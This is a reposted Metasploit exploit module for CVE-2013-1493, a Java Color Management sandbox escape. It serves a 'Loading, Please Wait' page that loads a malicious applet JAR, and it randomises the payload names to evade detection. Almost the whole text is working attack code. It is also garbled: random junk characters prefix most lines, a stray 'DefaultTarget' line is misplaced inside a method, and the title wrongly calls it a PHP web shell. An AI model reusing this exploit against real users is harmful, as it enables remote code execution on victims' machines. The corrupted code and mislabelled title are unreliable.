STUNSHELL PHP Web Shell远程执行代码

admin

##
4 T! ?( B1 b/ u5 j3 a0 @
# This file is part of the Metasploit Framework and may be subject to
& t8 m' s# O" W3 g% S3 U% z! X6 {# redistribution and commercial restrictions. Please see the Metasploit
# @, N) F+ L4 B0 t# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require ‘msf/core’
require ‘rex’
9 P2 ~  ~. ^6 |- v4 Pclass Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
' a7 g  @/ e0 s3 E2 ?include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
def initialize( info = {} )
5 o. }! r! y& P- \' v8 X& X4 Fsuper( update_info( info,
) H3 {' f# v9 l; F( z‘Name’ => ‘Java CMM Remote Code Execution’,
# u. y0 t0 k  g7 x5 x‘Description’ => %q{
This module abuses the Color Management classes from a Java Applet to run
arbitrary Java code outside of the sandbox as exploited in the wild in February
  }% B# m# `+ `% x$ Y; Q0 A& m, J; P" `4 Cand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
, g' }5 k4 v3 y* T& n! [! Ysystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
6 ?0 Q7 G, `) i: C3 G( Zwarning in order to run the malicious applet.
' w2 ~1 E. f3 I2 T( B8 ^},
; k3 U0 I( |, H+ S% w9 n, G‘License’ => MSF_LICENSE,
‘Author’ =>
'Unknown', # Vulnerability discovery and Exploit
5 {7 O% G3 M. s'juan vazquez' # Metasploit module (just ported the published exploit)
3 Y( B/ }  z9 a$ n# l6 ^1 ]9 V],
; O. Q+ ?' \0 o0 M5 x0 T/ V; b7 x‘References’ =>
3 ~/ U# A$ r/ A) y, x, d[
[ 'CVE', '2013-1493' ],
[ 'OSVDB', '90737' ],
* g5 A9 P' h# a/ _. H6 ^9 q[ 'BID', '58238' ],
% u; C6 |4 m! `$ w# ?1 z& b[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
6 z( ^$ Z, W, C[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
[ 'URL', 'http://pastie.org/pastes/6581034' ]
],
‘Platform’ => [ 'win', 'java' ],
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
3 L3 S3 i" e, b0 X; B9 c‘Targets’ =>
[
+ t* P) j0 b! x; N+ }- ?[ 'Generic (Java Payload)',
1 r; \$ B# k  x& Q. U" H{
2 Q2 l6 r$ }3 ]. X5 H'Platform' => 'java',
0 C/ f9 r6 [, y& y% S' F'Arch' => ARCH_JAVA
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
) S0 F% Y& I3 t8 H7 F. {2 ~0 ?( p'Arch' => ARCH_X86
}
]
/ s3 e. Y' Q9 h" B1 Z6 N5 ~" o],
‘‘DisclosureDate’ => ‘Mar 01 2013′
) Y# M$ \: D$ T( [) q: K))
% g# [9 |2 i2 T& o4 C' E# ]& {end
def setup
- `+ a. G, e2 qpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
8 ~9 S& C$ a1 y; ~6 I' npath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
6 {3 M$ k# `8 r; t# k; Fpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
% d: Q' _4 j+ P- C+ d# W& l. A@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
' N5 b5 L' F. t/ Y@init_class_name = rand_text_alpha(“Init”.length)
0 J% s4 f& t8 T1 s5 Z% p& b) Y6 ^* l@init_class.gsub!(“Init”, @init_class_name)
' p! b1 e8 G0 U+ M5 a  fsuper
end
def on_request_uri(cli, request)
, d( K6 y0 i% S2 J; a1 Fprint_status(“handling request for #{request.uri}”)
case request.uri
3 O/ `7 ^! Z0 R/ `9 j/ Wwhen /\.jar$/i
jar = payload.encoded_jar
+ A, X/ V# v3 U+ ljar.add_file(“#{@init_class_name}.class”, @init_class)
6 F+ [) s! `8 q  djar.add_file(“Leak.class”, @leak_class)
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
. j+ n3 N: W, N: h$ U8 q  Djar.add_file(“MyColorSpace.class”, @color_space_class)
DefaultTarget’ => 1,
metasploit_str = rand_text_alpha(“metasploit”.length)
* C4 ?2 x2 f( a* f( Ypayload_str = rand_text_alpha(“payload”.length)
jar.entries.each { |entry|
' j" c+ K$ y# h% E/ F1 ?entry.name.gsub!(“metasploit”, metasploit_str)
entry.name.gsub!(“Payload”, payload_str)
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
entry.data = entry.data.gsub(“Payload”, payload_str)
}
5 R4 [6 f$ t/ C7 ]: g0 _jar.build_manifest
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
6 T4 `8 s+ a7 o, c- vwhen /\/$/
, ]8 X4 q" O8 `: F7 c5 U) lpayload = regenerate_payload(cli)
if not payload
4 F- X* L& l7 r$ tprint_error(“Failed to generate the payload.”)
/ [; `/ J5 ?. d- Ssend_not_found(cli)
6 v! u$ U# c; F# A4 treturn
0 T4 x$ m# f0 i( c* Kend
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
else
send_redirect(cli, get_resource() + ‘/’, ”)
4 i( o) L8 q4 V$ Eend
end
def generate_html
1 K1 x" ^6 P, ]' phtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
7 r8 [0 r# Q2 uhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
& g5 }& m! G2 y/ C, m6 V) C9 Ihtml += %Q|</applet></body></html>|
return html
end
+ ?1 r7 O' c8 b( b! X& s7 ~end
end